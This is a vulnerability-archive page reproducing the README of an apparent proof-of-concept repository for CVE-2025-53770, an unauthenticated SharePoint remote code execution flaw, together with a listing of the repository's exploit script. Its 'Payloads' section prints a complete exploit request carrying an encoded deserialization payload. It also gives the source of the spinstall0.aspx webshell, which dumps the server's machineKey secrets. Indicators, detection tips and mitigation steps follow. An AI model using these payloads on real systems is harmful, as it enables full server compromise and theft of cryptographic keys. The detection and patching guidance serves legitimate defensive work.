关联漏洞
描述
CVE-2025-53770
介绍
# ToolShell Zero-Day: The Silent Killer Exploiting SharePoint (CVE-2025-53770) 🚨
<img width="612" height="408" alt="sharepoint-removebg-preview" src="https://github.com/user-attachments/assets/4d4957a2-c82d-4098-a0af-68f3c191114f" />
### 📌 Vulnerability Overview
* **Type**: Remote Code Execution (RCE)
* **CVSS Score**: 9.8 (Critical)
* **Component**: Microsoft SharePoint Server (on-prem)
* **Root Cause**: Insecure deserialization of **ViewState** data using stolen ASP.NET `machineKey` (ValidationKey and DecryptionKey).
* **Exploitation**: Requires no authentication.
* **Status**: Actively exploited in the wild.
* **Date Disclosed**: July 19, 2025
* **Discovered/Reported by**: Multiple security vendors and government incident response teams.
---
### 🛠️ Technical Details
1. **Initial foothold**:
* Attackers upload a crafted `.aspx` file (e.g., `spinstall0.aspx`) exploiting SharePoint’s deserialization flaws.
* This shell reads sensitive keys (`machineKey`) from memory.
2. **Persistence**:
* With those keys, attackers generate malicious ViewState payloads.
* These payloads bypass signature verification and execute arbitrary code under IIS worker process `w3wp.exe`.
3. **No patch = persistent access**, even after server reboot or app pool recycling.
---
### 💣 Payloads
```http
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close
MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQHUGQLIi0CAkgUSAw4YjBzeIFANm8i3%2Bz37MftXsyCyRlW7Zlz07PrhymKBaqMvPkyVNZAH%2F6%2Baeffvpv%2FNBv%2Bvm3f8KL1XtYLNP8rBkuwxcnMp0vRtPizcWZRv9enDRW2XI1T98U6Wo5D7MXJ3erKBvF79KH%2FnSSFm%2BiX34Ja3HtlX5ZvUi1Xy%2F%2FlRb%2Fj0dr8ksvXZKtPw7yrBcP0zz8M941Rx8%2BmPMw%2F%2FlnGvvDP%2BPlP%2F90tV28XvAlJ9s8KxZvTk%2FVm9dbvB8ul7PX5%2BebzeZsUz2bzu%2FPK5qmnw%2B6N2rZ%2FbX5IoHVN6ereVGutniZj%2BL5dDH9sHwZT%2FPXuO6luur0ZJS8OV1M85T%2BWqTL07f%2F%2FqeTT37IrTRL87RYnhRhnn484USt9Lq9KIN9c7qcr9LD5%2B4ibazmc0y%2BmcZhlpbDT9jZ24KLsyzd9h9m6ReuOlw5nI7i9CQfFbdxvJoDJA12w%2B3%2Br1URTVdFkiZfMvflEIfp8ItO%2FpjDn85apL%2Bt0iJ%2B7pSn3ZxtigPShD%2F58Oa0pGBjmmVpvASnF2dmWqTzUXx2M1os%2F6r%2F5S%2BPWdpL52vguDhrF8t0XoTZWWs7Cwk3bx7OZun8r5XDBC%2BNztz22c10IabzPFxiwouT49iPVJFW%2FVD78MsHXU9qWlgN37842BoVyXSzUE7eRmPEQm%2Fv5tP1KCG7d%2FN0ASxCClGgmtLNdD75AReqevSh%2BmvtVZhUX12k1dr794eYPgLof0Ej3r8%2FPVlykpDLsHighJ1%2BzODz55Lo%2FPtYxNc%2Fn6t8ecm2r9Xh%2BaEQv1TT37b7FVsqStaxt3%2F4F%2Bjkf5lXCdTzfv5a%2FQrzHxI%2BNUct8a05e0Mv1%2FqTAvlID7%2BEAenJSek3aW4%2FjLKjSM6nm9s5KM0CVl41DBeNYVjcpyDFqFik8%2BXXdewKWnDYLkbf3i9eYtFlCOocN5nkGbvMt1jziXTcfngsFZ8X8e%2Fg8clzamPvdkuR8Dk1eIUYKJw0wRuEunzQnlu53XQ5nCYWFOttExI2H4XZaJdenT%2F6%2FLtWugtJ%2FQDw4nt2k1J%2Bfo8UYPHXe9lLXi%2BW81Fxf%2Fr2fNN62DS0et2u1%2Bt35%2Fj51agffjYNeu1JqxZXnSzqbe5lLh%2FiSraOxpp2M66vuo2LzU3DaCbeVksGnezOq2XJwHnwvc2iLQzdz7czX1tmqXTWYUWu7rx21aq0dH%2FnVrr9yc4y3c1tcyLYfts23Gq2S0y5vJlY68jcZn7VmUWV2u5mkmQRbIded%2BVWLh9wzcStSM1visjT9%2F7V%2Bsl1Zxbl8aJt6jsf10VmNoJ%2FXjDo7ELvcnXXt5XP4%2Fqi3bL06NrR49y9xNo65g6jxubevZYjzBv3KrImzct54F1c%2BuO46vfl2Or729t%2BVwv69YtbTFFgyWZUlaukPmxGFX3jA4f4PjnYNNxMCzx9V69368b9yKof8Kzh%2Bu0i8CyNrosfatcB8IvzbMzxD4wh3u8Q%2F3HdvL719GU%2FHVhYU1u5VQeY1ArEuIwr1jomvEd%2Frzxhin3PnKjf08uk%2Beh9i14NxFivN%2F6fx8ih3Awqj%2F27aLazQ0ytwNtmQUVogbQoliH48sofMFfbiHcSDNodgzhttFpHjHyTXofDzdp%2FMDZRNcniwppirUW7oYsot9YBeG1XLpeRJ1ZBw3hnu52Z7SbC9qyqnW8NR2RGfyIasiXarivGgdbZ2G6s2XJWtb3EcJqG0XOFEbrCtF3hJFpnYLtS2NJy7ElgONXECFqiEU6E8DVx57ptHes7thRVe2IZTn9oSF00vJZoOa4Ywf5vtutYGC%2Fs%2FNJw8qXR95KGnIhWqIm%2B63Z2tutqtltz7HxmOC3dkBiPNXENP2SitbawL22ZOXY2NByZGX6eNODfdbfF9ivKfqdqF7BfuTS8QdKwXCGwfgj%2Fb2w3cLC%2BYU9g39UNH%2Bt3sX6iCQn7LazfQXzwL4N%2FieHS%2BERc9%2BE%2F8Olh%2FbEtA8MuHLZP8fvAJ9CEG2ht%2BB%2FMMV7l9YGPdBlfEWnCQ%2FwLjBe2dAp7AHyBgSwSA7bbkuPr4BqMeQL4ztg%2FmQkjBr7ID%2FlX4XGZVe0B%2FOs7RiCBf4vtO%2Fhfhf%2BwbyG%2BJfCThgf%2FE9j3XGHBPmIPLI5vHCj7mmj0NNECvgPEF%2FD8vX3PMgL4Hyn8R7A%2Fh33kP1H468LwwR%2F4ZgKfPuZv1Xyp5lcsQ0pB8VF%2Be5jfh%2F2A80%2F8mIB%2FhM8x%2F1vGz9UxvwZ8hQG6NawW528YaK0N84P4VRjAB%2FEVSaMHfLCOo%2FCn%2FBP%2BS6MH%2FniS%2BSfAD8o%2F1o6xxqVjFwp%2FF%2FywNWGCnwPY93m%2Bh3LLgG8r4%2FiRfxP2vYTzH18Av6qddTAO%2F6pH%2B5i%2FOuBfzDg%2FtH4E%2FoDDhI%2ByLzvAXwLfpeEC%2Fz7wQf4pfgF8Da6%2FLGD%2BE74W5gPjnqq%2FIeLDNcRv75LHfcX%2FzOb6Yfww30L8gvJvpK5oYf4E6%2FcO%2FNvnHzikLXGN%2BAL410H8O9tzkF%2FJ%2Be%2FrnH8T%2F6n%2BEV9C%2FHbswUzVP%2FiFuVT%2FHvAHtrLK%2BKG2mf%2BYH0NffFV%2FAxV%2FoOLXdK5%2FYNMGPwPFH8QG3tsTneuX8t91OX%2BwT%2Fkfjjn%2BCerPzQwX8cO%2BifURP%2FGf8p8o%2Fpf1R%2Fojlf7MVfxS2YePiJ%2Fqv91X%2BF9z%2FRP%2FMsS3Mzj%2F4C%2FlH%2FVD8SVV5AfjCfM3MBOqP6ofip%2F4ayj%2BzYyeCf4LQfjzfKw%2FxPw15iv96BsGuN9wNOYH9KMj2b4nDOY%2F%2BOdmjJ%2BIlX68%2Bhr%2Fj%2Fwj%2Fe1w%2FXlYv6z%2FDOPYA%2BSY4ysyrl%2Fm%2F7H%2BOgf9Jfyraj7pL%2FEP%2FqF%2BHcn6M0H9gyO%2Bsk%2F6Cf9JnxNrzz%2FCn%2FRHKvyRe4o%2FGPP%2BMRbAT1L%2BDegz6R%2Fpj8b4eqgP4g%2FpbyVh%2FSn5D34PoR9ZwfELaUjgDx8p%2F4Rfhfc3wr8vVP4HzH8T8d8iPtLXDvOvECr%2B4iP%2BbZR%2BoX4zg%2FNH%2BtRX%2BkP8byj9p%2F3PeUJ%2FRE3pP%2FGv1L8K2yf8oV%2BMv8P8zpFfLVP8Az7grgt8Hg76Q%2FFL4COP%2BMP%2BWsWfFGwf6%2FsYd7U9%2F4j%2FgVD2Lfaf8IcOUH7IfnjgP%2Bkf7BP%2BVF8ux0%2F%2BI78e9okc%2Bc0t3j%2BJf4mKv8n7J%2FNf7T%2BED%2B1%2FvqoP4r%2BaT%2FWB%2Bintm2X8c%2BYfxTfusH34z%2FaxTqD0l%2BwjjtJ%2BH%2FxPsL7af9rEj4LjJ%2F1B%2FQRC7R%2BYLwPG5%2BP934X%2BYO5efzzuP9h%2BcMg%2F9kDqf1yln3Kt8BeH%2Bo%2FL%2Bk%2BY%2F0OD%2BUf7L2qb7EODSH9HZfzrvf0e8bPC%2Bzvp5zhR%2BI%2B5%2Fsk%2BuOkPGP89%2F3Zf0R%2BqX%2FDDwXzan4DfbvjN%2Bi%2FjJ%2FtD1X%2BRfgvFf%2Bg%2F9Q%2BP6r%2Bl8IWGUX%2BI%2BkN97f3H%2Fkf8GkquH4o%2F4%2Fw1YLvUrzbxt6P4I3j%2FYf5POP%2Fk%2F9P8a3H9k74h%2FzJA%2FgvOP%2BqQ9reu8t9zP9Vf8I%2FGvWP%2Bq2zf1Qsb3DjYP9afpfY3yr%2Bqfx%2F9FelP2f%2B4HD%2Ftf6w%2Fqv%2BB%2F4%2F4T%2FHjGuI%2F9i%2FCH%2F0n1R%2Ft7xcq%2F2X%2FR%2FYxjv0bzY9A7J0u1w%2F13%2Fv%2BU%2BF%2F7R%2Fwp%2F56Vt33f7T%2FoX8wpeq%2FaP9fH%2FTXXDL%2F0H9z%2FbuKfwHrL%2Fc%2FgvWb6o%2FmK%2F6R%2FmE%2BxU%2F5y3j%2FaR%2FrL1D7D8W%2Fx3%2FC%2Fd8w0R7j73B%2FRf5Hqn7J%2F1rZfxTUvzP%2F80P%2FSfyfKv5L1f8%2Fqb9Di%2FvPXFfxg7%2F7%2FRPjvyn8MZ%2F3n4z7d8R%2Fban62z2u%2Fx7ON6Q%2F6J%2Bpvkdl%2F20x%2FrR%2F6Bnvf6gfzj%2BuqfH%2Bxf2PxfGT%2F7F76P93qv9A%2FZJ96n9Mdf4IVX0TPoGqP8SP%2FRv9D%2FGP5pf9F%2FCn%2FnNsMH8ofuBP%2Bl%2FiT%2FqD%2FYfOHwp%2Fqr9ryfkVF0f9L%2Fdf9I%2Bu6q8sxa8n65%2F3F%2Fjf4v7Dc6pKf1X%2Fhf6zTf0f7Ael%2FkBfhJoPjbt1RbOnekicnyyH44c%2BUP7p%2FIP9gfAPyvrE%2Fkn4S3U%2BK%2Fcv%2BI91W8AXsbmZ2r9MnM9a6vyA9V3g12b%2BSeR%2FVJ5fMI46ErctbFFu5xb9yQX3r4%2FGcYbd7899NY4e9NE49f%2BS92eqb6n4cxyn%2FrcF%2FgF77r8wTvkXrM9Uf5hL82ncUvVJ5x%2BD8Zfq%2FGwmKv%2FVMv6C%2Bv8esPPK%2BBPOj9AP52%2FoXw%2Fa2oP%2BwX8D%2BvZO9aeJ6q8KtT95Gfe3pB9Zia%2Fk%2BcfzeQMcofMX6esrdT5AfaK%2FtHfq%2FJGo%2BpggfvB%2FiPrGWK7w71eYf8R%2F0gdNnX9xvqbzi47%2BI2d9pvUnNtd3GR%2F6Fxva2qP%2BG%2Fx2VH1jfSfg8zXpA%2BL3K8meH9h%2FBfynHh7nT5x9DvHBP%2BQ3VPVZ3j%2Bg%2BOE%2F8StS82Ef%2B4JrY34G%2F8Ff9Ki0f6WqvkPED%2F%2B72n7%2FInwx30hU%2FkZKP%2Bj8Rv23weuTfuOaFvC%2FC7g%2FoP4G8fVL%2FDAeqfsjUukf4Qd%2BEr9RHzg7G6Hqz8j%2BcX3aP0nfPL7%2FsPcP%2BbHoDI0ecGnYutJniq%2Bv8C%2FzP1PnG%2BzvdH8D%2BF8r%2F8k%2B6sdDfJR%2FxE%2F4YbypzkfU%2F8aayu92j5%2BBvo7GwW3SX%2FCD9B3zH9lvl%2Fkt7%2F9kSp8qS%2B7vk3L%2FVPdn4B%2FhP3C4P6X8kr4hf3T%2FqFHqZ4kv%2B0%2F29%2FypcP9k%2B9d8H6tiLYO6Lejtd94P43uFjRauN2WBscyo6FliDtdBs34deVILzctJ1%2B426zvjcO%2FPMeUC59VhYsp%2BMOjMfG87S3PB9xJ75uUiMOXDO%2B24puPVtLiYrA%2F3kbNOFuT7%2B8gXq74nl34uH3peLY%2F0L%2Fr6t87vqJukkw7HbE%2FpV4s%2Fa%2F7NsXEejGunFptu2x9Yu8DTR9H1xExM8RBUpNYqnGGcJ1ki6BppxFUri7zOIrVrmj%2FoFMHAcdOBkfVzsQzs2RJ%2FT6OKc%2Bt7etb0PrNn1O02%2FreaXfFd%2BZ4%2Fik9EhfOQ2v4N%2Bb6od44YFHLlV%2Bq7f%2BT93hvxf8O2Y2bDoFJbA%2BOZX%2B2u3OvO2q%2FIXfywuT%2Fw8e%2F5LON%2BQ8y6iQbWOKp2FqHXRiwB3aMm7l9ayhZsbu7tqlwk1%2FIh6OurYCC1OBcL%2BGYnHs2zboJB5kaVZRaN9ZG1S4aW19WtcavW3TlZt3lfa9z71u%2F0bMls0r13Y%2FZtnDf%2BHdeWtKhOtIZTV3VL9%2FEbl0eO5DJHjYwTE76OahbVH3LSifJg7VboGZVYhIPZkMcnw3VkOll8H%2FNaqua2x5p0a8PIczt2ZTvEZ1yDDWnN4N%2BQ8bVn%2FdBLVqgtyu1DY6LTvCzOuP5tB3Gzdmio%2FapcBlSzmxbVq1Gvd9vN43MYrnlPx4Fow9pkKW26oF8mC3qz9gwuGn3SmaQxfKpmPvvsne1LWvru0V4BfIoovwSfs3H8ULPj%2FHIcQMfaQuH%2BTjzxPO%2Fzz2ZKY6dGQz1%2FUnHw%2B%2BTwLKlhc7AmP3ip65%2F5Zwx53hx6rnV37Xt69hKTjvaeHV9IC3SP8XWiwt51R8bBh%2B%2BN59EDI9Mk96%2FFwe7ev3BgraN%2F%2BHOySZc5dF%2F%2BdtjnjsrB9ObqvHy8%2Fexv0%2Fzgo%2FQr9aWGdvlg%2FNGj7sfffDh9e3X%2B8YXP%2BsbOd3%2FF4Or8O7%2BA8dWv9sw2xRe%2F1EPfaHnyqzxf%2FjbM1fkn39x5%2B%2Bf%2FAT299nCZKQAA%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E%0A%3C%2FScorecard%3AExcelDataSet%3E%0A++%3C%2Fdiv%3E%0A%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A++++
```
**Secondary Payload (spinstall0.aspx)**
```http
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>
```
**Expected Machine Key Response Format**
```json
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string]
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40
```
---
### 📂 Affected Products
| Product | Status |
| --------------------------------- | ------------ |
| SharePoint Server 2016 (on-prem) | Vulnerable |
| SharePoint Server 2019 (on-prem) | Vulnerable |
| SharePoint Subscription Edition | Vulnerable |
| SharePoint Online (Microsoft 365) | Not affected |
---
### 📡 Exploitation Indicators
* Upload of `spinstall0.aspx` or similar shell files.
* Requests to:
* `/sites/*/_layouts/15/ToolPane.aspx?DisplayMode=Edit`
* With referrer: `_layouts/SignOut.aspx`
* `w3wp.exe` spawning `cmd.exe`, `powershell.exe`, or `rundll32`.
---
### 🧪 Detection Tips
#### Web Logs:
* Look for unusual POST requests to SharePoint layout pages.
* Search for access logs involving `/layouts/` with uncommon user agents.
#### File System:
* Scan for unrecognized `.aspx` files in:
* `%ProgramFiles%\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\`
#### Processes:
* Monitor for anomalous child processes under `w3wp.exe`.
#### Network:
* Detect outbound connections to known attacker IPs:
* `107.191.58.76`, `96.9.125.147`, `104.238.159.149`
---
### 🔐 Mitigation
#### Before Patch:
1. **Enable AMSI**:
* Use Microsoft Defender Antivirus with AMSI support.
* AMSI can detect malicious ViewState payloads before execution.
2. **Apply Network Controls**:
* Restrict SharePoint server access to internal networks only.
3. **Deploy EDR/XDR**:
* Use Defender for Endpoint or similar for behavioral detection.
#### After Patch:
1. **Install July 2025 Updates**:
* Microsoft released hotfixes for SharePoint 2016, 2019, and Subscription Edition.
2. **Rotate `machineKey`**:
* Change ASP.NET `ValidationKey` and `DecryptionKey` in `web.config`.
* Force restart of IIS (`iisreset`) to apply changes.
3. **Audit & Cleanup**:
* Remove rogue `.aspx` files.
* Check for scheduled tasks or persistence mechanisms.
---
### 🛡️ Summary
* A high-impact zero-day in SharePoint allows full server compromise via forged ViewState payloads.
* Active exploitation confirmed.
* Patch immediately, rotate encryption keys, and scan for compromise indicators.
---
### 🛡️ SharePoint Server Subscription Edition
This build contains the **official security fix for CVE‑2025‑53770**, released in **KB5002768** (July 2025).
---
## 🔧 Confirm Patch Was Applied
You can verify your SharePoint build by running:
```powershell
(Get-SPFarm).BuildVersion
```
If it returns:
```text
16.0.18526.20508
```
<img width="885" height="338" alt="bug7" src="https://github.com/user-attachments/assets/89b2ce88-a6af-4ea7-b005-b2bc4fb7366b" />
✅ You're fully patched against **CVE‑2025‑53770** for this version.
---
## 📌 Reminder: Still Do These
Even after updating to this build:
1. **Enable AMSI + Defender AV**
* Protects against future deserialization attacks
2. **Rotate MachineKeys**
* Prevents reused tokens if your keys were stolen
3. **Check for compromise**
* Look for webshells like `spinstall0.aspx`
---
### ⚠️ Disclaimer
> For educational and authorized testing only.
> The author is not responsible for any misuse.
> Use at your own risk. Unauthorized use is illegal.
文件快照
[4.0K] /data/pocs/4cfc4bc6bded34558faff6544ea993981cda5595
├── [4.6K] config.json
├── [ 40K] CVE-2025-53770.py
├── [ 14K] README.md
└── [ 32] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。